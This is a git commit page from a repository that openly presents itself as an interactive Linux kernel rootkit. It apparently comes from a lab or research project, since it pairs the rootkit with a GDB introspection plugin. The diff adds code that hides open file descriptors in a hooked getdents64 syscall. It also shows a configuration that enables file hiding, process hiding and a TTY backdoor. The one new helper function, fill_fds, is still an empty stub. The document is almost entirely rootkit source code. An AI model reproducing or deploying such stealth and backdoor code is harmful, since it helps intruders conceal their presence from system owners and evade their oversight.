linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 65326beeb178c63171971ae3e17ef187ae818f7b
parent 31e98138b510307507cb0c689748505ade0434b4
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 19:35:17 +0100

Add rootkit bool for open file hiding, include check for fd list

Diffstat:

Msrc/g7.c | 1+


Msrc/hideopen.c | 6++++++


Msrc/hideopen.h | 5++++-


Msrc/hook.c | 11+++++++----


Msrc/rootkit.h | 1+


5 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/src/g7.c b/src/g7.c
@@ -42,6 +42,7 @@ static struct file_operations g7_fops =
 rootkit_t rootkit = {
     .hiding_files = true,
     .hiding_pids  = true,
+    .hiding_open_files = true,
     .backdoor = BD_TTY,
 };
 
diff --git a/src/hideopen.c b/src/hideopen.c
@@ -68,6 +68,12 @@ may_fd(struct file *dirfile)
 }
 
 void
+fill_fds(pid_t pid)
+{
+    
+}
+
+void
 clear_hidden_fds(void)
 {
     fd_list_t_ptr i = hidden_fds_tail;
diff --git a/src/hideopen.h b/src/hideopen.h
@@ -3,6 +3,8 @@
 
 #include <linux/types.h>
 
+#define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))
+
 typedef struct fd_list *fd_list_t_ptr;
 typedef struct fd_list {
     int fd;
@@ -12,7 +14,8 @@ typedef struct fd_list {
 
 extern fd_list_t hidden_fds;
 
-pid_t may_fd(struct file *dirfile);
+pid_t may_fd(struct file *);
+void fill_fds(pid_t);
 
 void clear_hidden_fds(void);
 bool list_contains_fd(fd_list_t_ptr, int);
diff --git a/src/hook.c b/src/hook.c
@@ -213,9 +213,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
     if (copy_from_user(kdirent, dirent, ret))
         goto yield;
 
-    if((fd_pid = may_fd(dirfile)) != -1)
-        is_fd = 1;
-
     atomic_inc(&getdents64_count);
 
     kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
@@ -235,12 +232,18 @@ g7_getdents64(const struct pt_regs *pt_regs)
                 hi_tail = add_inode_to_list(hi_tail, inode);
         }
     }
+    
+    if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
+        is_fd = 1;
+        fill_fds(fd_pid);
+    }
 
     for (offset = 0; offset < ret;) {
         cur_kdirent = (dirent64_t_ptr)((char *)kdirent + offset);
 
         if ((may_proc && list_contains_pid(&hidden_pids, PID_FROM_NAME(cur_kdirent->d_name)))
-            || list_contains_inode(hi_head, cur_kdirent->d_ino))
+            || list_contains_inode(hi_head, cur_kdirent->d_ino)
+            || list_contains_fd(&hidden_fds, FD_FROM_NAME(cur_kdirent->d_name)))
         {
             if (cur_kdirent == kdirent) {
                 ret -= cur_kdirent->d_reclen;
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -13,6 +13,7 @@ typedef struct {
     sc_hook_t hooks[16];
     bool hiding_files;
     bool hiding_pids;
+    bool hiding_open_files;
     bd_state_t backdoor;
 } rootkit_t;